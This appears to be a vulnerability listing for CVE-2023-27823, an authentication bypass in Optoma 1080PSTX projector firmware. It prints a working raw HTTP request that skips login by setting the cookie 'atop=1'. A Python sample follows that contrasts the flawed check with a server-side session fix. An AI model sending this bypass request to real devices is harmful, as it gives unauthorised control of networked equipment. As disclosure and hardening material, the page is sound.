Optoma 1080PSTX Firmware C02 Authentication Bypass

CVE: CVE-2023-27823
Category: CWE-287
Price: $5,000
Severity: Critical
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2023-05-10

Our sensors found this exploit at:

Below is a copy:

# Exploit Title: Optoma 1080PSTX Firmware C02 - Auth Bypass
# Date: 2023/05/09
# Exploit Author: Anthony Cole
# Contact:
# Website:
# Vendor Homepage:
# Version: Optoma 1080PSTX Firmware C02
# Tested on: N/A
# CVE : CVE-2023-27823

By default, the web interface of the 1080PSTX requires a username and password to access the application control panel. However, an attacker on the same network can bypass this check by manually setting the "atop" cookie to the value "1".

GET /index.asp HTTP/1.1
Host: projector
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: atop=1
Connection: close
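
Added example, not part of the original advisory and not the projector's firmware code: a minimal Python model of the weakness class (CWE-287) described above, placing a check that trusts a client-set "atop=1" flag beside a server-side session check. The `sid` cookie name, the `SessionStore` class, and the sample credentials are hypothetical, and passwords are kept in plain text only to keep the model short.

```python
import secrets
from http.cookies import SimpleCookie
from typing import Optional


def parse_cookies(header: str) -> dict:
    """Parse a Cookie request header into a name -> value dict."""
    jar = SimpleCookie()
    jar.load(header)
    return {name: morsel.value for name, morsel in jar.items()}


def weak_is_authenticated(cookie_header: str) -> bool:
    # Flawed pattern: a fixed flag that the client can set is the only
    # proof of login, so the server cannot tell a real login from a
    # hand-written cookie.
    return parse_cookies(cookie_header).get("atop") == "1"


class SessionStore:
    """Hardened pattern: the cookie carries only an unguessable token,
    and the login state itself lives on the server."""

    def __init__(self) -> None:
        self._sessions = {}  # token -> username

    def login(self, username: str, password: str, users: dict) -> Optional[str]:
        expected = users.get(username)
        # Constant-time comparison; a real device would store a salted
        # password hash rather than the password (simplified here).
        if expected is None or not secrets.compare_digest(
            password.encode(), expected.encode()
        ):
            return None
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._sessions[token] = username
        return token

    def is_authenticated(self, cookie_header: str) -> bool:
        # Only tokens this server issued after a successful login count;
        # any other cookie, including "atop=1", is ignored.
        token = parse_cookies(cookie_header).get("sid", "")
        return token in self._sessions

    def logout(self, cookie_header: str) -> None:
        # Invalidate server-side so a captured cookie stops working.
        self._sessions.pop(parse_cookies(cookie_header).get("sid", ""), None)
```
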
